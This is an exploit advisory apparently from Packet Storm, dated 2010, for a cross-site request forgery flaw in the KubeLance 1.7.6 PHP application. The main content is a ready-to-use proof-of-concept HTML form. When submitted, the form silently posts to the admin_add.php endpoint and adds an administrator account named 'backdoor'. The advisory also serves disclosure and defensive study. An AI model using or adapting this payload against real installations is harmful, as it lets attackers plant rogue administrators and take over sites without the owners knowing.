KubeLance 1.7.6 Cross Site Request Forgery

2010-02-03T00:00:00
ID PACKETSTORM:85881
Type packetstorm
Reporter Milos Zivanovic
Modified 2010-02-03T00:00:00

Description

                                        
                                            `[#-----------------------------------------------------------------------------------------------#]  
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability  
[#] Author: Milos Zivanovic  
[#] Email: milosz.security[at]gmail[dot]com  
[#] Date: 02. February 2010.  
[#-----------------------------------------------------------------------------------------------#]  
[#] Application: KubeLance  
[#] Version: 1.7.6  
[#] Platform: PHP  
[#] Link: http://www.kubelabs.com/kubelance/  
[#] Price: 90 $  
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)  
[#-----------------------------------------------------------------------------------------------#]  
  
KubeLance script lack of cross site request forgery protection, allowing us  
to make exploit and  
add new admin user.  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">  
<input type="hidden" name="username" value="backdoor">  
<input type="hidden" name="password" value="another-admin-added">  
<input type="submit" name="submit">  
</form>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[#]EOF  
`